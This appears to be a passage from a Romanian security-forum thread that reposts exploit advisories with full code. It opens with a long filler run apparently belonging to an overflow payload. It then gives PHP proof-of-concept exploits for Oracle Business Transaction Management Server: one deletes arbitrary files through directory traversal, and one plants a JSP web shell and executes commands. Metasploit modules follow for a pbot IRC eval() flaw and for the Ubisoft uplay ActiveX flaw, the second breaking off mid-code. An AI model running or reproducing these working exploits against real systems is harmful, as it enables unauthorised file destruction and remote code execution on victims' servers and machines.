aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaavaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb="cccc" > </EMBED> Sursa
-
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService Remote File Deletion Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService Remote File Deletion tested against: Microsoft Windows Server 2003 r2 sp2 Oracle WebLogic Server 12c (12.1.1) Oracle Business Transaction Management Server 12.1.0.2.7 (Production version) files tested: oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic) download url: http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html BTM_Servers_12.1.0.2.7.zip (BTM, production version) download url: http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html vulnerability: the mentioned product installs a web service called "FlashTunnelService" which can be reached without prior authentication and processes incoming SOAP requests. It can be reached at the following uri: http://[host]:7001/btmui/soa/flash_svc/ This soap interface exposes the 'deleteFile' function which could allow to delete arbitrary files with administrative privileges on the target server through a directory traversal vulnerability. This could be useful for further attacks. Example packet: POST /btmui/soa/flash_svc/ HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "http://soa.amberpoint.com/deleteFile" User-Agent: Jakarta Commons-HttpClient/3.1 Host: [host]:7001 Content-Length: [length] <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types"> <soapenv:Header/> <soapenv:Body> <int:deleteFileRequest> <int:deleteFile handle="../../../../../../../../../../../../somepath/somefile.ext"> <typ:DeleteFileRequestVersion> </typ:DeleteFileRequestVersion> </int:deleteFile> </int:deleteFileRequest> </soapenv:Body> </soapenv:Envelope> Vulnerable code, see the decompiled com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl class: ... public IDeleteFileResponse deleteFile(IDeleteFileRequest request) throws SOAPFaultException { DeleteFileResponse dfr = new DeleteFileResponse(); String handle = request.getHandle(); File f = getFileFromHandle(handle); if(f != null) f.delete(); return dfr; } ... As attachment, proof of concept code. <?php /* Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService Remote File Deletion poc tested against: Microsoft Windows Server 2003 r2 sp2 Oracle WebLogic Server 12c (12.1.1) Oracle Business Transaction Management Server 12.1.0.2.7 (Production version) Example: C:\php>php 9sg_ora2.php 192.168.2.101 boot.ini C:\php>php 9sg_ora2.php 192.168.2.101 windows\system32\win.ini rgod */ error_reporting(E_ALL ^ E_NOTICE); set_time_limit(0); $err[0] = "[!] This script is intended to be launched from the cli!"; $err[1] = "[!] You need the curl extesion loaded!"; if (php_sapi_name() <> "cli") { die($err[0]); } function syntax() { print("usage: php 9sg_ora2.php [ip_address] [file_to_delete]\r\n" ); die(); } $argv[2] ? print("[*] Attacking...\n") : syntax(); if (!extension_loaded('curl')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; if ($win) { !dl("php_curl.dll") ? die($err[1]) : print("[*] curl loaded\n"); } else { !dl("php_curl.so") ? die($err[1]) : print("[*] curl loaded\n"); } } function _s($url, $is_post, $ck, $request) { global $_use_proxy, $proxy_host, $proxy_port; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); if ($is_post == 1) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $request); } if ($is_post == 2) { curl_setopt($ch, CURLOPT_PUT, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $request); } curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, array( "Content-Type: text/xml;charset=UTF-8", "SOAPAction: \"http://soa.amberpoint.com/deleteFile\"", )); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Jakarta Commons-HttpClient/3.1"); //curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); //curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_TIMEOUT, 0); if ($_use_proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port); } $_d = curl_exec($ch); if (curl_errno($ch)) { //die("[!] ".curl_error($ch)."\n"); } else { curl_close($ch); } return $_d; } $host = $argv[1]; $port = 7001; $file = $argv[2]; $soap='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types"> <soapenv:Header/> <soapenv:Body> <int:deleteFileRequest> <int:deleteFile handle="../../../../../../../../../../../../../../../../../../'.$file.'"> <typ:DeleteFileRequestVersion> </typ:DeleteFileRequestVersion> </int:deleteFile> </int:deleteFileRequest> </soapenv:Body> </soapenv:Envelope>'; $url = "http://$host:$port/btmui/soa/flash_svc/"; $out = _s($url, 1, "", $soap); print($out."\n"); ?> Sursa
-
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService WriteToFile Message RCE Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService WriteToFile Message Remote Code Execution Exploit tested against: Microsoft Windows Server 2003 r2 sp2 Oracle WebLogic Server 12c (12.1.1) Oracle Business Transaction Management Server 12.1.0.2.7 (Production version) files tested: oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic) download url: http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html BTM_Servers_12.1.0.2.7.zip (BTM, production version) download url: http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html vulnerability: the mentioned product installs a web service called "FlashTunnelService" which can be reached without prior authentication and processes incoming SOAP requests. It can be reached at the following uri: http://[host]:7001/btmui/soa/flash_svc/ This soap interface exposes the writeToFile function which could allow to write arbitrary files on the target server. Example packet: POST /btmui/soa/flash_svc/ HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "http://soa.amberpoint.com/writeToFile" User-Agent: Jakarta Commons-HttpClient/3.1 Host: 192.168.0.1:7001 Content-Length: [length] <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types"> <soapenv:Header/> <soapenv:Body> <int:writeToFileRequest> <int:writeToFile handle="..\..\..\..\..\..\..\..\[path]\somefile.jsp"> <!--Zero or more repetitions:--> <typ:text>[cod]</typ:text> <!--Optional:--> <typ:WriteToFileRequestVersion> <!--You may enter ANY elements at this point--> </typ:WriteToFileRequestVersion> </int:writeToFile> </int:writeToFileRequest> </soapenv:Body> </soapenv:Envelope> the 'handle' property can be used to control the location of the newly written file (it suffers of a directory traversal ulnerability). File extension can also be controlled. File content can be controlled through the 'text' element (note that one must convert the code to html entities firstly, the soap interface will reconvert it to his original format). Given this, a remote attacker, could place an arbitrary jsp script inside the main web server root path, then execute arbitrary code with the privileges of the weblogic installation, usually Administrator privileges). vulnerable code, see the decompiled com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl.class ... public IWriteToFileResponse writeToFile(IWriteToFileRequest request) throws SOAPFaultException { WriteToFileResponse wtfr = new WriteToFileResponse(); String handle = request.getHandle(); TypedList text = request.getText(); if(text != null && text.size() > 0) { File f = getFileFromHandle(handle); if(f != null) try { FileOutputStream fos = new FileOutputStream(f); OutputStreamWriter osw = new OutputStreamWriter(fos, "UTF-8"); int i = 0; for(int ii = text.size(); i < ii; i++) { String s = (String)text.get(i); osw.write(s); osw.write("\n"); } osw.close(); } catch(IOException ex) { logger.log(Level.SEVERE, (new StringBuilder()).append("IOException writing '").append(f.toString()).append("': ").append(ex.getMessage()).toString()); } } return wtfr; } ... As attachment, proof of concept code written in php, launch from the command line, modify for your own use. <?php /* Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService WriteToFile Message Remote Code Execution Exploit tested against: Microsoft Windows Server 2003 r2 sp2 Oracle WebLogic Server 12c (12.1.1) Oracle Business Transaction Management Server 12.1.0.2.7 (Production version) Example: C:\php>php 9sg_ora.php 192.168.2.101 ver [*] Attacking... HTTP/1.1 200 OK Date: Mon, 09 Jul 2012 08:53:11 GMT Accept-Ranges: bytes Content-Length: 40 Content-Type: text/plain Last-Modified: Mon, 09 Jul 2012 08:53:09 GMT X-Powered-By: Servlet/3.0 JSP/2.2 Microsoft Windows [Version 5.2.3790] C:\php>php 9sg_ora.php 192.168.2.101 "start calc" rgod */ error_reporting(E_ALL ^ E_NOTICE); set_time_limit(0); $err[0] = "[!] This script is intended to be launched from the cli!"; $err[1] = "[!] You need the curl extesion loaded!"; if (php_sapi_name() <> "cli") { die($err[0]); } function syntax() { print("usage: php 9sg_ora.php [ip_address] [cmd]\r\n" ); die(); } $argv[2] ? print("[*] Attacking...\n") : syntax(); if (!extension_loaded('curl')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false; if ($win) { !dl("php_curl.dll") ? die($err[1]) : print("[*] curl loaded\n"); } else { !dl("php_curl.so") ? die($err[1]) : print("[*] curl loaded\n"); } } function _s($url, $is_post, $ck, $request) { global $_use_proxy, $proxy_host, $proxy_port; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); if ($is_post == 1) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $request); } if ($is_post == 2) { curl_setopt($ch, CURLOPT_PUT, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $request); } curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, array( "Content-Type: text/xml;charset=UTF-8", "SOAPAction: \"http://soa.amberpoint.com/writeToFile\"", )); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Jakarta Commons-HttpClient/3.1"); //curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); //curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_TIMEOUT, 0); if ($_use_proxy) { curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port); } $_d = curl_exec($ch); if (curl_errno($ch)) { //die("[!] ".curl_error($ch)."\n"); } else { curl_close($ch); } return $_d; } $host = $argv[1]; $port = 7001; $cmd = $argv[2]; $code='<%@ page import="java.util.*,java.io.*" %> <% String cmd = request.getParameter("cmd"); String outstr = ""; try { Runtime rt = Runtime.getRuntime(); Process p = rt.exec(cmd); try { InputStreamReader ise = new InputStreamReader(p.getErrorStream()); BufferedReader bre = new BufferedReader(ise); InputStreamReader iso = new InputStreamReader(p.getInputStream()); BufferedReader bro = new BufferedReader(iso); String line=null; while ( (line = bre.readLine()) != null ) { System.out.println( line ); } while ( (line = bro.readLine()) != null ) { System.out.println(line ); } } catch (IOException ioe) { ioe.printStackTrace(); } } catch (Throwable t) { t.printStackTrace(); } %> '; $code=htmlentities($code); //convert all to html entities, then no bad chars //we should write to: //C:\Oracle\Middleware\wlserver_12.1\samples\server\examples\build\mainWebApp\WEB-INF\classes\mainWebApp#\suntzu.jsp //C:\Oracle\Middleware\wlserver_12.1\samples\server\examples\build\mainWebApp\suntzu.jsp //change to a location of choice $path=array('\server\examples\build\mainWebApp', '\server\examples\build\mainWebApp\WEB-INF\classes\mainWebApp#'); for ($i=0; $i<count($path); $i++){ $soap='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types"> <soapenv:Header/> <soapenv:Body> <int:writeToFileRequest> <int:writeToFile handle="..\..\..\..\..\..\..\..\..\..'.$path[$i].'\suntzu.jsp"> <typ:text>'.$code.'</typ:text> <typ:WriteToFileRequestVersion> </typ:WriteToFileRequestVersion> </int:writeToFile> </int:writeToFileRequest> </soapenv:Body> </soapenv:Envelope>'; $url = "http://$host:$port/btmui/soa/flash_svc/"; $out = _s($url, 1, "", $soap); //print($out."\n"); sleep(1); } $cmd="cmd.exe /c ".$cmd." > ../../server/examples/build/mainWebApp/sh.txt"; $url = "http://$host:$port/suntzu.jsp?cmd=".urlencode($cmd); $out = _s($url, 0, "", ""); //print($out."\n"); sleep(2); $url = "http://$host:$port/sh.txt"; $out = _s($url, 0, "", ""); print($out."\n"); ?> Sursa
-
also, un "exploit mai recent" , asem?n?tor, publicat tot pe exploit-db : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'PHP IRC Bot pbot eval() Remote Code Execution', 'Description' => %q{ This module allows remote command execution on the PHP IRC bot pbot by abusing the usage of eval() in the implementation of the .php command. In order to work, the data to connect to the IRC server and channel where find pbot must be provided. The module has been successfully tested on the version of pbot analyzed by Jay Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP SP3. }, 'Author' => [ 'evilcry', # pbot analysis' 'Jay Turla', # pbot analysis '@bwallHatesTwits', # PoC 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'EDB', '20168' ], [ 'URL', 'http://offensivecomputing.net/?q=node/1417'], [ 'URL', 'http://resources.infosecinstitute.com/pbot-analysis/'] ], 'Platform' => [ 'unix', 'win'], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 344, # According to RFC 2812, the max length message is 512, including the cr-lf 'BadChars' => '', 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', } }, 'Targets' => [ [ 'pbot', { } ] ], 'Privileged' => false, 'DisclosureDate' => 'Nov 02 2009', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(6667), OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']), OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']), OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']), OptString.new('PBOT_PASSWORD', [false, 'pbot Password', '']) ], self.class) end def check connect response = register(sock) if response =~ /463/ or response =~ /464/ print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return Exploit::CheckCode::Unknown end response = join(sock) if not response =~ /353/ and not response =~ /366/ print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") return Exploit::CheckCode::Unknown end response = pbot_login(sock) quit(sock) disconnect if response =~ /auth/ and response =~ /logged in/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def send_msg(sock, data) sock.put(data) data = "" begin read_data = sock.get_once(-1, 1) while not read_data.nil? data << read_data read_data = sock.get_once(-1, 1) end rescue EOFError end data end def register(sock) msg = "" if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty? msg << "PASS #{datastore['IRC_PASSWORD']}\r\n" end if datastore['NICK'].length > 9 nick = rand_text_alpha(9) print_error("The nick is longer than 9 characters, using #{nick}") else nick = datastore['NICK'] end msg << "NICK #{nick}\r\n" msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n" response = send_msg(sock,msg) return response end def join(sock) join_msg = "JOIN #{datastore['CHANNEL']}\r\n" response = send_msg(sock, join_msg) return response end def pbot_login(sock) login_msg = "PRIVMSG #{datastore['CHANNEL']} :.login" if datastore['PBOT_PASSWORD'] and not datastore['PBOT_PASSWORD'].empty? login_msg << " #{datastore['PBOT_PASSWORD']}" end login_msg << "\r\n" response = send_msg(sock, login_msg) return response end def pbot_command(sock) encoded = Rex::Text.encode_base64(payload.encoded) command_msg = "PRIVMSG #{datastore['CHANNEL']} :.php #{rand_text_alpha(1)} passthru(base64_decode(\"#{encoded}\"));\r\n" response = send_msg(sock, command_msg) return response end def quit(sock) quit_msg = "QUIT :bye bye\r\n" sock.put(quit_msg) end def exploit connect print_status("#{rhost}:#{rport} - Registering with the IRC Server...") response = register(sock) if response =~ /463/ or response =~ /464/ print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return end print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...") response = join(sock) if not response =~ /353/ and not response =~ /366/ print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") return end print_status("#{rhost}:#{rport} - Registering with the pbot...") response = pbot_login(sock) if not response =~ /auth/ or not response =~ /logged in/ print_error("#{rhost}:#{rport} - Error registering with the pbot") return end print_status("#{rhost}:#{rport} - Exploiting the pbot...") pbot_command(sock) quit(sock) disconnect end end
-
also, pe Exploit-DB : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution', 'Description' => %q{ The uplay ActiveX component allows an attacker to execute any command line action. User must sign in, unless auto-sign in is enabled and uplay must not already be running. Due to the way the malicious executable is served (WebDAV), the module must be run on port 80, so please make sure you have enough privilege to do that. Ubisoft released patch 2.04 as of Mon 20th July. }, 'License' => MSF_LICENSE, 'Author' => [ 'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Initial discovery 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', 'phillips321 <phillips321[at]phillips321.co.uk>', 'Richard Hicks <scriptmonkeyblog[at]gmail.com>' ], 'References' => [ [ 'OSVDB', '84402'], [ 'URL', 'http://seclists.org/fulldisclosure/2012/Jul/375'] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 29 2012')) register_options( [ OptPort.new('SRVPORT', [true, "The daemon port to listen on (do not change)", 80]), OptString.new('URIPATH', [true, "The URI to use (do not change).", "/"]), OptString.new('EXPLOITPATH', [false, "The URI to use for the exploit"]) ], self.class) # WebDAV does not support SSL and must run over port 80. deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT' 'URIPATH') end def autofilter false end def check_dependencies use_zlib end def is_exploitable?(req) # Only engage Win XP SP3 targets req.headers['User-Agent'] =~ /NT 5\.1/ end def on_request_uri(cli, request) case request.method when 'OPTIONS' process_options(cli, request) when 'PROPFIND' process_propfind(cli, request) when 'GET' if request.uri_parts['Resource'].include? @uplay_uri if is_exploitable?(request) prompt_uplay(cli, request) else print_error("Not the target we want, will not engage.") resp = create_response(404, "Not Found") resp.body = "" resp['Content-Type'] = 'text/html' cli.send_response(resp) end else process_get(cli, request) end else vprint_status("#{request.method} => 404 (#{request.uri})") resp = create_response(404, "Not 